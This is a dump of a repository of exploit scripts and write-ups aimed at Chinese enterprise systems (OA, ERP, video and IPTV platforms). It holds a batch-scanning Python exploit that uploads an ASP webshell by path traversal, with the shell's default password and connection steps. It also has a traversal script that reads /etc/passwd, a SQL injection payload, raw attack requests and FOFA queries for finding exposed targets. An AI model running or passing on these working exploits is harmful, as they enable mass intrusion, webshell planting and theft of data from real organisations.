├── .gitattributes ├── 20231217奥威亚视屏云平台VideoCover存在前台任意文件上传 ├── assets │ ├── image-20231218141232094.png │ ├── image-20231218141232948.png │ ├── image-20231218141301264.png │ └── image-20231218141409421.png ├── poc.py ├── readme.md └── y1.asp ├── 20231218TamronOS IPTV系统后台任意文件下载 ├── assets │ ├── image-20231218203706239.png │ ├── image-20231218203720139.png │ └── image-20231218203739540.png ├── poc.py └── readme.md ├── 20231219EasyCVR 视频管理平台存在用户信息泄露 ├── assets │ ├── image-20231219105430982.png │ ├── image-20231219105512392.png │ ├── image-20231219105617309.png │ └── image-20231219105706862.png ├── poc.py └── readme.md ├── 20231220积木报表系统testConnection接口存在远程命令执行漏洞 ├── assets │ ├── image-20231220193316926.png │ └── image-20231220193335920.png └── poc.py ├── 20231221全程云OA-ajax-sql注入漏洞 ├── assets │ ├── image-20231221171330774.png │ └── image-20231221171404651.png ├── poc.py └── readme.md ├── 20231222大唐电信AC集中管理平台存在敏感信息泄漏 ├── assets │ └── image-20231222130430538.png ├── poc.py └── readme.md ├── 20231223海翔ERPgetylist_login.doSQL注入漏洞 ├── assets │ ├── image-20231223223607591.png │ ├── image-20231223223621029.png │ └── image-20231223223806747.png ├── poc.py └── readme.md ├── 20231224通达三个漏洞 ├── assets │ ├── image-20231224113959549.png │ └── image-20231224114053918.png ├── exp2.py ├── exp3.py ├── poc.py ├── poc2.py ├── poc3.py └── readme.md ├── 20231225用友NC_mxservlet反序列化漏洞 ├── assets │ ├── image-20231225211647123.png │ └── image-20231225211841367.png ├── poc.py ├── readme.md └── yongyou-nc-MxServlet-rce-exp.py ├── 20231226某运维堡垒机存在任意文件读取漏洞 ├── poc.py └── readme.md ├── 20231227wordpress_admin-ajax.php文件包含漏洞 ├── poc2.py └── readme.md ├── 20231228某电子水库安全监管平台sql注入 ├── poc.py └── readme.md ├── 20231229用友NC Cloud soapFormat接口XXE漏洞 ├── poc.md └── poc.py ├── 20231230金和-c6 gethomeinfo sql注入 ├── poc.md └── poc.py ├── 20231231海康威视-综合安防管理平台applyautologinticket 反序列化 ├── poc.py └── readme.md ├── 20240102某神SecGate3600 authManageSet.cgi信息泄露漏洞 ├── poc.py └── readme.md ├── 20240103FreeRDP存在任意文件读取漏洞 ├── poc.py └── readme.md ├── 20240104某友CRM存在任意文件读取 ├── poc.py └── readme.md ├── 20240105用友sql注入 ├── poc.py └── readme.md ├── 20240106某友CRM存在日志信息泄露 ├── assets │ ├── image-20240107234411105.png │ └── image-20240107234454131.png ├── poc.py └── readme.md ├── 20240107上海某公司防火墙信息泄露 ├── assets │ └── image-20240108000010545.png ├── poc1228.py └── readme.md ├── 20240108某r信topsec远程命令执行 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240109金蝶云星空反序列化远程代码执行漏洞 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240110用友NC_Cloud_soapFormat.ajax接口XXE漏洞 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240111先锋WEB燃气收费系统 Upload.aspx 文件上传漏洞 ├── assets │ ├── image-20240108000010545.png │ └── image-20240111204822977.png ├── poc.py └── readme.md ├── 20240112用友U8 CRM系统help2 任意文件读取漏洞 ├── assets │ └── image-20240108000010545.png ├── poc.py └── readme.md ├── 20240115金和OA C6 upload_json.asp存在任意文件上传漏洞 ├── assets │ ├── image-20240108000010545.png │ └── image-20240115225358128.png ├── poc.py └── readme.md ├── 20240118某擎rptsvr 任意文件上传 ├── assets │ ├── image-20240118193841950.png │ └── image-20240118194414299.png ├── poc.py └── readme.md ├── 20240121cellinx 摄像机 uac.cgi 未授权添加用户漏洞EXP ├── assets │ ├── image-20240121123506173.png │ ├── image-20240121123615474.png │ └── image-20240121123620660.png ├── poc.py └── readme.md ├── 20240122Hytec Inter HWL 2511 SS路由器命令执行漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240122222409091.png ├── poc.py └── readme.md ├── 20240126Laykefu客服系统 任意文件上传漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240126001223257.png ├── poc.py └── readme.md ├── 20240127万户OA text2Html 任意文件读取 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240128Aria2 WebUI文件读取 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240129宏景EHR view接口sql注入漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240201用友系统-U9企业版存在任意文件上传漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240127122138808.png ├── poc.py └── readme.md ├── 20240202万户OA-senddocument_import.jsp任意文件上传漏洞-1 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py ├── readme.md └── y1.jsp ├── 20240203亿赛通电子文档安全管理系统 uploadfiletocatalog sql注入 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240205帮管客CRM 文件上传 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py ├── readme.md └── y1.php ├── 20240206百为智能流控路由器RCE ├── assets │ ├── Snipaste_2024-02-07_19-04-37.png │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240218WordPress Plugin HTML5 Video Player SQL注入漏洞 ├── assets │ └── image-20240628210919948.png ├── poc.py └── readme.md ├── 20240219用友政务A++V832产品未授权访问漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240221亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240224用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240303华天动力OA8000办公系统ntkodownload.jsp存在任意文件读取漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240304九思OA软件user_list_3g.jsp存在SQL注入漏洞 ├── assets │ ├── image-20240121123620660.png │ └── image-20240202203022822.png ├── poc.py └── readme.md ├── 20240307iohttp 目录遍历漏洞(CVE-2024-23334) ├── assets │ ├── image-20240121123620660.png │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240309JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198) ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240310宏景某接口存在任意文件读取漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240311weiphp5.0存在远程代码执行漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240313天问物业ERP系统docfileDownLoad.aspx接口存在任意文件读取漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240314金和OA portalwb-con-template-viewcontemplate 远程命令执行 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240318京师心智心理健康测评系统-存在敏感信息泄露 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240321用友NC runScript接口存在SQL注入-附py ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240327某友时空KSOA imagefield接口SQL注入漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240328某凌EIS智慧协同平台doc_fileedit_word.aspxSQL注入 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240331用友U8-nc.bs.sm.login2.RegisterServlet SQL注入 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240405maxView系统dynamiccontent.properties.xhtml远程代码执行漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240406万户ezOFFICE-wf_printnum.jspSQL注入漏洞 ├── assets │ └── image-20240307092017883.png ├── poc.py └── readme.md ├── 20240407畅捷通T+ KeyInfoList.aspx SQL漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240409用友NC Cloud importhttpscer任意文件上传 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240412weaver-eoffice-webservice文件上传 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240414用友-U8C-SQL注入-FormulaViewAction ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240415王道汽车4S企业管理系统 SQL注入漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md ├── 20240419jeevms 仓库管理系统 fileread文件读取漏洞 ├── assets │ └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md └── 20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞 ├── assets └── Snipaste_2024-04-07_21-14-08.png ├── poc.py └── readme.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232094.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232094.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232948.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141232948.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141301264.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141301264.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141409421.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/assets/image-20231218141409421.png -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from rich.console import Console 6 | import argparse 7 | import re 8 | import multiprocessing 9 | from multiprocessing.dummy import Pool 10 | 11 | console = Console() 12 | def now_time(): 13 | return time.strftime("[%H:%M:%S] ", time.localtime()) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 25 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 26 | 27 | 888888888888 28 | 29 | tag: this is a 奥威亚视屏云平台VideoCover前台任意文件上传 poc 30 | @version: 1.0.0 @author: Y1_K1NG 31 | """ 32 | print(test) 33 | 34 | 35 | def poc(target): 36 | if target[:4] != 'http': 37 | target = 'http://' + target 38 | if target[-1] != '/': 39 | target += '/' 40 | headers = { 41 | "Cache-Control": "no-cache", 42 | "Upgrade-Insecure-Requests": "1", 43 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36", 44 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9", 45 | "Accept-Encoding": "gzip, deflate", 46 | "Accept-Language": "zh-CN,zh;g=0.9", 47 | "Connection": "close", 48 | "Pragma": "no-cache", 49 | # "Content-Type": "multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10" 50 | 51 | } 52 | # data = """ 53 | # --68c4ca658cd4332dc386f53710e63a10 54 | # Content-Disposition: form-data; name="file"; filename="/../../../AVA.ResourcesPlatform.WebUI/y1.asp" 55 | # Content-Type: image/jpeg 56 | # 57 | # yijuhuamuma 58 | # --68c4ca658cd4332dc386f53710e63a10-- 59 | # """ 60 | files = {'file': ("y1.asp", open('y1.asp', 'rb'), 'image/jpeg')} 61 | 62 | url = target + "/Tools/Video/VideoCover.aspx" 63 | response = requests.post(url, headers=headers, files=files, verify=False, timeout=5) 64 | # print(response.request.headers) 65 | # print(response.request.body) 66 | try: 67 | response = requests.post(url, headers=headers, files=files, verify=False, timeout=5) 68 | match = re.search(r"Success", response.text) 69 | if match: 70 | if response.status_code == 200: 71 | print(f"[+]{target} is valuable") 72 | with open("result.txt", "a+", encoding="utf-8") as f: 73 | f.write(target + "y1.asp" + "\n") 74 | else: 75 | print(f"[!]{target} response code is not 200") 76 | else: 77 | print(f"[!]{target} doesn't have vulnerable") 78 | except: 79 | print(f"[*] {target} error") 80 | 81 | 82 | def main(): 83 | banner() 84 | parser = argparse.ArgumentParser(description='canal admin weak Password') 85 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: www.example.com") 86 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 87 | args = parser.parse_args() 88 | if args.url and not args.file: 89 | poc(args.url) 90 | elif not args.url and args.file: 91 | url_list = [] 92 | with open(args.file, "r", encoding="utf-8") as f: 93 | for url in f.readlines(): 94 | url_list.append(url.strip().replace("\n", "")) 95 | 96 | mp = Pool(10) # 创建一个拥有20个线程的线程池 97 | mp.map(poc, url_list) 98 | mp.close() 99 | mp.join() 100 | else: 101 | print(f"Usag:\n\t python3 {sys.argv[0]} -h") 102 | 103 | 104 | if __name__ == '__main__': 105 | main() 106 | 107 | -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/readme.md: -------------------------------------------------------------------------------- 1 | # fofa语法: 2 | 3 | body="/CSS/NewtonTheme/assets/app.css" 4 | 5 | 6 | 7 | # 使用 8 | 9 | 10 | 11 | python poc.py -u ip:port 12 | 13 | python poc.py -f url.txt 14 | 15 | ![image-20231218141232094](assets/image-20231218141232094.png) 16 | 17 | ![image-20231218141301264](assets/image-20231218141301264.png) 18 | 19 | webshell默认密码 y1k1ng 20 | 21 | 冰蝎连接 22 | 23 | ![image-20231218141409421](assets/image-20231218141409421.png) 24 | 25 | 由于传播、利用所发布的项目造成的任何直接或者间接的后果及损失,均由使用者本人承担。原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 26 | 27 | -------------------------------------------------------------------------------- /20231217奥威亚视屏云平台VideoCover存在前台任意文件上传/y1.asp: -------------------------------------------------------------------------------- 1 | <% 2 | 14 | %> -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203706239.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203706239.png -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203720139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203720139.png -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203739540.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231218TamronOS IPTV系统后台任意文件下载/assets/image-20231218203739540.png -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import time 3 | import requests 4 | import urllib3 5 | from rich.console import Console 6 | import argparse 7 | import re 8 | import multiprocessing 9 | from multiprocessing.dummy import Pool 10 | 11 | 12 | def banner(): 13 | test = """ 14 | 15 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 16 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 17 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 18 | "8aa8" 88 88,d88' 88 88 `8b 88 88 19 | `88' 88 8888"88, 88 88 `8b 88 88 88888 20 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 21 | 88 88 88 "88, 88 88 `8888 Y8a. .a88 22 | 88 88 88 Y8b 88 88 `888 `"Y88888P" 23 | 24 | 888888888888 25 | 26 | tag: this is a TamronOS IPTV系统后台任意文件下载 poc 27 | @version: 1.0.0 @author: Y1_K1NG 28 | """ 29 | print(test) 30 | 31 | 32 | def poc(target): 33 | headers = { 34 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36", 35 | "Accept": "application/json, text/plain, */*", 36 | "Accept-Encoding": "gzip, deflate", 37 | "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", 38 | "Connection": "close", 39 | 40 | } 41 | 42 | url = target + "/download/backup?name=./../../../../../etc/passwd" 43 | try: 44 | response = requests.get(url, headers=headers, verify=False, timeout=5) 45 | match = re.search(r"root", response.text) 46 | if response.status_code == 200: 47 | if match: 48 | print(f"[+]{target} is valuable") 49 | with open("result.txt", "a+", encoding="utf-8") as f: 50 | f.write(target + "\n") 51 | else: 52 | print(f"[-]{target} is not echo") 53 | else: 54 | print(f"[-]{target} is not valuable") 55 | except: 56 | print(f"[*] {target} error") 57 | 58 | 59 | def main(): 60 | banner() 61 | parser = argparse.ArgumentParser(description='canal admin weak Password') 62 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 63 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 64 | args = parser.parse_args() 65 | if args.url and not args.file: 66 | poc(args.url) 67 | elif not args.url and args.file: 68 | url_list = [] 69 | with open(args.file, "r", encoding="utf-8") as f: 70 | for url in f.readlines(): 71 | url_list.append(url.strip().replace("\n", "")) 72 | 73 | mp = Pool(10) # 创建一个拥有20个线程的线程池 74 | mp.map(poc, url_list) 75 | mp.close() 76 | mp.join() 77 | else: 78 | print(f"Usag:\n\t python3 {sys.argv[0]} -h") 79 | 80 | 81 | if __name__ == '__main__': 82 | main() 83 | -------------------------------------------------------------------------------- /20231218TamronOS IPTV系统后台任意文件下载/readme.md: -------------------------------------------------------------------------------- 1 | ## 漏洞描述 2 | 3 | TamronOS IPTV系统存在任意文件下载 4 | 5 | ## 漏洞影响 6 | 7 | TamronOS IPTV V5 3.6.6 8 | 9 | ## FOFA 10 | 11 | title="TamronOS IPTV系统" 12 | 13 | 14 | 15 | # 使用 16 | 17 | 18 | 19 | python poc.py -u ip:port 20 | 21 | python poc.py -f url.txt 22 | 23 | ![image-20231218203706239](assets/image-20231218203706239.png) 24 | 25 | ![image-20231218203720139](assets/image-20231218203720139.png) 26 | 27 | ![image-20231218203739540](assets/image-20231218203739540.png) 28 | 29 | 30 | 31 | 由于传播、利用所发布的项目造成的任何直接或者间接的后果及损失,均由使用者本人承担。原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 32 | 33 | -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105430982.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105430982.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105512392.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105512392.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105617309.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105617309.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105706862.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231219EasyCVR 视频管理平台存在用户信息泄露/assets/image-20231219105706862.png -------------------------------------------------------------------------------- /20231219EasyCVR 视频管理平台存在用户信息泄露/readme.md: -------------------------------------------------------------------------------- 1 | # EasyCVR 视频管理平台存在用户信息泄露 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | fofa:title="EasyCVR" 8 | 9 | POC: 10 | 11 | /api/v1/userlist?pageindex=0&pagesize=10 12 | 13 | 14 | 15 | 直接GET请求即可 16 | 17 | ![image-20231219105512392](assets/image-20231219105512392.png) 18 | 19 | 批量poc(记得安装库) 20 | 21 | python poc.py -u 22 | 23 | ![image-20231219105617309](assets/image-20231219105617309.png) 24 | 25 | python poc.py -f .txt 26 | 27 | ![image-20231219105706862](assets/image-20231219105706862.png) -------------------------------------------------------------------------------- /20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193316926.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193316926.png -------------------------------------------------------------------------------- /20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193335920.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231220积木报表系统testConnection接口存在远程命令执行漏洞/assets/image-20231220193335920.png -------------------------------------------------------------------------------- /20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171330774.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171330774.png -------------------------------------------------------------------------------- /20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171404651.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231221全程云OA-ajax-sql注入漏洞/assets/image-20231221171404651.png -------------------------------------------------------------------------------- /20231221全程云OA-ajax-sql注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # oday-全程云OA-ajax-sql注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | oday-全程云OA-ajax-sql注入漏洞 6 | 7 | 直接post请求即可 8 | 9 | poc 以及批量脚本已经上传圈子(补充:0day poc圈子当天公布,github推迟两天公布) 10 | 11 | 批量poc(记得安装库) 12 | 13 | python poc.py -u 14 | 15 | ![image-20231221171404651](assets/image-20231221171404651.png) 16 | 17 | python poc.py -f .txt 18 | 19 | ![image-20231221171330774](assets/image-20231221171330774.png) 20 | 21 | 批量脚本获取 22 | 23 | https://pc.fenchuan8.com/#/index?forum=62709&yqm=M1R3 24 | 25 | ![image-20231221173222581](C:/Users/11464/AppData/Roaming/Typora/typora-user-images/image-20231221173222581.png) 26 | 27 | ![image-20231221173209225](C:/Users/11464/AppData/Roaming/Typora/typora-user-images/image-20231221173209225.png) -------------------------------------------------------------------------------- /20231222大唐电信AC集中管理平台存在敏感信息泄漏/assets/image-20231222130430538.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231222大唐电信AC集中管理平台存在敏感信息泄漏/assets/image-20231222130430538.png -------------------------------------------------------------------------------- /20231222大唐电信AC集中管理平台存在敏感信息泄漏/readme.md: -------------------------------------------------------------------------------- 1 | # 大唐电信AC集中管理平台存在敏感信息泄漏漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ==" 8 | 9 | ## 漏洞复现 10 | 11 | POC: 12 | 13 | **GET** /actpt.data HTTP/1.1 14 | 15 | **Host:** 16 | 17 | **User-Agent:** Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 18 | 19 | **Accept:** text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 20 | 21 | Connection: Keep-Alive 22 | 23 | Pragma: no-cache 24 | 25 | Cache-Control: no-cache 26 | 27 | Upgrade-Insecure-Requests: 1 28 | 29 | **Accept-Encoding:** gzip, deflate 30 | 31 | **Accept-Language:** zh-CN,zh;q=0.9 32 | 33 | 直接GET请求即可 34 | 35 | 36 | 37 | 批量poc(记得安装库) 38 | 39 | python poc.py -u 40 | 41 | 42 | 43 | python poc.py -f .txt 44 | 45 | ![image-20231222130430538](assets/image-20231222130430538.png) -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223607591.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223607591.png -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223621029.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223621029.png -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223806747.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231223海翔ERPgetylist_login.doSQL注入漏洞/assets/image-20231223223806747.png -------------------------------------------------------------------------------- /20231223海翔ERPgetylist_login.doSQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 海翔ERP getylist_login.do SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa语法 6 | 7 | ***\*body="checkMacWaitingSecond"\**** 8 | 9 | POC: 10 | 11 | POST /getylist_login.do HTTP/1.1 12 | 13 | Host: 14 | 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 16 | 17 | Connection: close 18 | 19 | Content-Length: 77 20 | 21 | Accept-Encoding: gzip 22 | 23 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 24 | 25 | 26 | 27 | accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));-- 28 | 29 | 30 | 31 | ![image-20231223223607591](assets/image-20231223223607591.png) 32 | 33 | 34 | 35 | 批量poc(记得安装库) 36 | 37 | python poc.py -u 38 | 39 | 40 | 41 | python poc.py -f .txt 42 | 43 | ![image-20231223223806747](assets/image-20231223223806747.png) -------------------------------------------------------------------------------- /20231224通达三个漏洞/assets/image-20231224113959549.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231224通达三个漏洞/assets/image-20231224113959549.png -------------------------------------------------------------------------------- /20231224通达三个漏洞/assets/image-20231224114053918.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20231224通达三个漏洞/assets/image-20231224114053918.png -------------------------------------------------------------------------------- /20231224通达三个漏洞/exp2.py: -------------------------------------------------------------------------------- 1 | import requests,re,urllib3,sys 2 | from hashlib import md5 3 | import binascii 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 